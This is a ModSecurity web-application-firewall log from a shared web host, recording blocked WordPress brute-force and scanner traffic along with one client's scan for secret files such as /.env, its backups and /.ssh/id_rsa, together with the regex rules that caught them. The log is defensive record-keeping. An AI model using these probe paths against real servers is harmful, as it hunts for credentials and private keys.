[Tue May 26 15:39:15.485465 2026] [security2:error] [pid 733610:tid 733840] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxS8LL_4PasUNKBsfGBgAAAGQ"]
[Tue May 26 15:39:15.551533 2026] [security2:error] [pid 733610:tid 733775] [client 103.153.130.62:55439] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVxS8LL_4PasUNKBsfGEAAAACM"]
[Tue May 26 15:39:15.551667 2026] [security2:error] [pid 733610:tid 733775] [client 103.153.130.62:55439] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVxS8LL_4PasUNKBsfGEAAAACM"]
[Tue May 26 15:39:16.119169 2026] [security2:error] [pid 733610:tid 733852] [client 5.255.126.59:40910] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxS8LL_4PasUNKBsfGGAAAAHA"]
[Tue May 26 15:39:17.283846 2026] [security2:error] [pid 733610:tid 733770] [client 5.255.126.59:40910] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxTcLL_4PasUNKBsfGLQAAAB4"]
[Tue May 26 15:39:18.686152 2026] [security2:error] [pid 733610:tid 733653] [remote 163.223.13.54:42492] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 54.13.223.163.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahVxTsLL_4PasUNKBsfGUgAAESo"]
[Tue May 26 15:39:18.737246 2026] [security2:error] [pid 733610:tid 733811] [client 5.255.126.59:40910] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxTsLL_4PasUNKBsfGVgAAAEc"]
[Tue May 26 15:39:19.286794 2026] [security2:error] [pid 733610:tid 733856] [client 5.255.126.59:40910] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxT8LL_4PasUNKBsfGZAAAAHQ"]
[Tue May 26 15:39:19.931762 2026] [security2:error] [pid 733610:tid 733798] [client 5.255.126.59:40910] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxT8LL_4PasUNKBsfGdAAAADo"]
[Tue May 26 15:39:19.954419 2026] [security2:error] [pid 733610:tid 733833] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxT8LL_4PasUNKBsfGagAAAF0"]
[Tue May 26 15:39:21.654857 2026] [security2:error] [pid 733610:tid 733828] [client 5.255.126.59:40910] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxUcLL_4PasUNKBsfGogAAAFg"]
[Tue May 26 15:39:22.181877 2026] [security2:error] [pid 733610:tid 733760] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxUcLL_4PasUNKBsfGrgAAABQ"]
[Tue May 26 15:39:22.261210 2026] [security2:error] [pid 733610:tid 733805] [client 5.255.126.59:40910] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxUsLL_4PasUNKBsfGuAAAAEE"]
[Tue May 26 15:39:22.513745 2026] [security2:error] [pid 733610:tid 733835] [client 193.37.33.132:58869] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 132.33.37.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahVxUsLL_4PasUNKBsfGvwAAAF8"]
[Tue May 26 15:39:22.600601 2026] [security2:error] [pid 733610:tid 733821] [client 223.123.38.127:15214] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.38.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVxUsLL_4PasUNKBsfGzgAAAFE"]
[Tue May 26 15:39:22.600745 2026] [security2:error] [pid 733610:tid 733821] [client 223.123.38.127:15214] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVxUsLL_4PasUNKBsfGzgAAAFE"]
[Tue May 26 15:39:22.681739 2026] [security2:error] [pid 733610:tid 733840] [client 5.255.126.59:40910] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxUsLL_4PasUNKBsfGzQAAAGQ"]
[Tue May 26 15:39:23.155974 2026] [security2:error] [pid 733610:tid 733747] [client 5.255.126.59:40910] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxUsLL_4PasUNKBsfG3AAAAAc"]
[Tue May 26 15:39:23.608514 2026] [security2:error] [pid 733610:tid 733676] [remote 111.229.141.137:34978] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVxU8LL_4PasUNKBsfG7wAAeUE"]
[Tue May 26 15:39:23.703689 2026] [security2:error] [pid 733610:tid 733833] [client 5.255.126.59:40910] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxU8LL_4PasUNKBsfG9wAAAF0"]
[Tue May 26 15:39:23.840038 2026] [security2:error] [pid 733610:tid 733740] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxU8LL_4PasUNKBsfG8QAAAAA"]
[Tue May 26 15:39:24.512242 2026] [security2:error] [pid 733610:tid 733867] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVMLL_4PasUNKBsfHDAAAAH8"]
[Tue May 26 15:39:25.202864 2026] [security2:error] [pid 733610:tid 733772] [client 5.255.126.59:51312] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVcLL_4PasUNKBsfHHAAAACA"]
[Tue May 26 15:39:25.330527 2026] [security2:error] [pid 733610:tid 733755] [client 5.255.126.59:51158] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.bloggertarget.com"] [uri "/backend/.env"] [unique_id "ahVxVcLL_4PasUNKBsfHNQAAAA8"]
[Tue May 26 15:39:25.330571 2026] [security2:error] [pid 733610:tid 733815] [client 5.255.126.59:51164] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.bloggertarget.com"] [uri "/app/.env"] [unique_id "ahVxVcLL_4PasUNKBsfHMQAAAEs"]
[Tue May 26 15:39:25.330753 2026] [security2:error] [pid 733610:tid 733785] [client 5.255.126.59:51136] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.bloggertarget.com"] [uri "/api/.env"] [unique_id "ahVxVcLL_4PasUNKBsfHMwAAAC0"]
[Tue May 26 15:39:25.331106 2026] [security2:error] [pid 733610:tid 733742] [client 5.255.126.59:51016] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.bloggertarget.com"] [uri "/.env"] [unique_id "ahVxVcLL_4PasUNKBsfHLgAAAAI"]
[Tue May 26 15:39:25.331438 2026] [security2:error] [pid 733610:tid 733826] [client 5.255.126.59:51076] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.bloggertarget.com"] [uri "/.env.backup"] [unique_id "ahVxVcLL_4PasUNKBsfHMgAAAFY"]
[Tue May 26 15:39:25.332639 2026] [security2:error] [pid 733610:tid 733839] [client 5.255.126.59:51180] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.bloggertarget.com"] [uri "/public/.env"] [unique_id "ahVxVcLL_4PasUNKBsfHLQAAAGM"]
[Tue May 26 15:39:25.375297 2026] [security2:error] [pid 733610:tid 733769] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVcLL_4PasUNKBsfHLAAAAB0"]
[Tue May 26 15:39:25.377188 2026] [security2:error] [pid 733610:tid 733857] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVcLL_4PasUNKBsfHKgAAAHU"]
[Tue May 26 15:39:25.377693 2026] [security2:error] [pid 733610:tid 733855] [client 5.255.126.59:50968] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVcLL_4PasUNKBsfHJAAAAHM"]
[Tue May 26 15:39:25.386085 2026] [security2:error] [pid 733610:tid 733822] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVcLL_4PasUNKBsfHKwAAAFI"]
[Tue May 26 15:39:25.551567 2026] [security2:error] [pid 733610:tid 733858] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVcLL_4PasUNKBsfHPQAAAHY"]
[Tue May 26 15:39:25.552248 2026] [security2:error] [pid 733610:tid 733774] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVcLL_4PasUNKBsfHQgAAACI"]
[Tue May 26 15:39:25.555528 2026] [security2:error] [pid 733610:tid 733854] [client 5.255.126.59:51250] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVcLL_4PasUNKBsfHNAAAAHI"]
[Tue May 26 15:39:26.106749 2026] [security2:error] [pid 733610:tid 733790] [client 5.255.126.59:51188] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.bloggertarget.com"] [uri "/.env.old"] [unique_id "ahVxVsLL_4PasUNKBsfHcwAAADI"]
[Tue May 26 15:39:26.107353 2026] [security2:error] [pid 733610:tid 733741] [client 5.255.126.59:50982] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.bloggertarget.com"] [uri "/.env.bak"] [unique_id "ahVxVsLL_4PasUNKBsfHdAAAAAE"]
[Tue May 26 15:39:26.122586 2026] [security2:error] [pid 733610:tid 733865] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxVcLL_4PasUNKBsfHWAAAAH0"]
[Tue May 26 15:39:26.209435 2026] [security2:error] [pid 733610:tid 733743] [client 103.153.130.62:55694] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVxVsLL_4PasUNKBsfHcgAAAAM"]
[Tue May 26 15:39:26.209616 2026] [security2:error] [pid 733610:tid 733743] [client 103.153.130.62:55694] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVxVsLL_4PasUNKBsfHcgAAAAM"]
[Tue May 26 15:39:26.285487 2026] [security2:error] [pid 733610:tid 733814] [client 5.255.126.59:51308] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVcLL_4PasUNKBsfHQwAAAEo"]
[Tue May 26 15:39:26.291585 2026] [security2:error] [pid 733610:tid 733760] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVcLL_4PasUNKBsfHPwAAABQ"]
[Tue May 26 15:39:26.297078 2026] [security2:error] [pid 733610:tid 733776] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVcLL_4PasUNKBsfHPgAAACQ"]
[Tue May 26 15:39:26.304228 2026] [security2:error] [pid 733610:tid 733819] [client 5.255.126.59:51210] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVcLL_4PasUNKBsfHRAAAAE8"]
[Tue May 26 15:39:26.325383 2026] [security2:error] [pid 733610:tid 733827] [client 5.255.126.59:51294] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVcLL_4PasUNKBsfHRQAAAFc"]
[Tue May 26 15:39:26.330552 2026] [security2:error] [pid 733610:tid 733764] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVcLL_4PasUNKBsfHSwAAABg"]
[Tue May 26 15:39:26.346423 2026] [security2:error] [pid 733610:tid 733779] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVcLL_4PasUNKBsfHQQAAACc"]
[Tue May 26 15:39:26.354227 2026] [security2:error] [pid 733610:tid 733768] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVcLL_4PasUNKBsfHSgAAABw"]
[Tue May 26 15:39:26.462912 2026] [security2:error] [pid 733610:tid 733840] [client 5.255.126.59:51136] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVcLL_4PasUNKBsfHYQAAAGQ"]
[Tue May 26 15:39:26.467740 2026] [security2:error] [pid 733610:tid 733831] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVcLL_4PasUNKBsfHaAAAAFs"]
[Tue May 26 15:39:26.470934 2026] [security2:error] [pid 733610:tid 733829] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVsLL_4PasUNKBsfHdwAAAFk"]
[Tue May 26 15:39:26.471477 2026] [security2:error] [pid 733610:tid 733850] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVcLL_4PasUNKBsfHaQAAAG4"]
[Tue May 26 15:39:26.482678 2026] [security2:error] [pid 733610:tid 733864] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVcLL_4PasUNKBsfHawAAAHw"]
[Tue May 26 15:39:26.482961 2026] [security2:error] [pid 733610:tid 733853] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVcLL_4PasUNKBsfHagAAAHE"]
[Tue May 26 15:39:26.488597 2026] [security2:error] [pid 733610:tid 733791] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVcLL_4PasUNKBsfHZwAAADM"]
[Tue May 26 15:39:26.491665 2026] [security2:error] [pid 733610:tid 733811] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVsLL_4PasUNKBsfHegAAAEc"]
[Tue May 26 15:39:26.492208 2026] [security2:error] [pid 733610:tid 733849] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVcLL_4PasUNKBsfHbgAAAG0"]
[Tue May 26 15:39:26.661787 2026] [security2:error] [pid 733610:tid 733744] [client 5.255.126.59:51028] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "www.bloggertarget.com"] [uri "/.ssh/id_rsa"] [unique_id "ahVxVsLL_4PasUNKBsfHiwAAAAQ"]
[Tue May 26 15:39:26.663298 2026] [security2:error] [pid 733610:tid 733782] [client 5.255.126.59:51062] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "www.bloggertarget.com"] [uri "/.ssh/id_dsa"] [unique_id "ahVxVsLL_4PasUNKBsfHjAAAACo"]
[Tue May 26 15:39:27.281907 2026] [security2:error] [pid 733610:tid 733743] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVsLL_4PasUNKBsfHkwAAAAM"]
[Tue May 26 15:39:27.287441 2026] [security2:error] [pid 733610:tid 733799] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVsLL_4PasUNKBsfHkgAAADs"]
[Tue May 26 15:39:27.442450 2026] [security2:error] [pid 733610:tid 733755] [client 5.255.126.59:51294] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVsLL_4PasUNKBsfHnAAAAA8"]
[Tue May 26 15:39:27.454334 2026] [security2:error] [pid 733610:tid 733775] [client 5.255.126.59:50962] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVsLL_4PasUNKBsfHmwAAACM"]
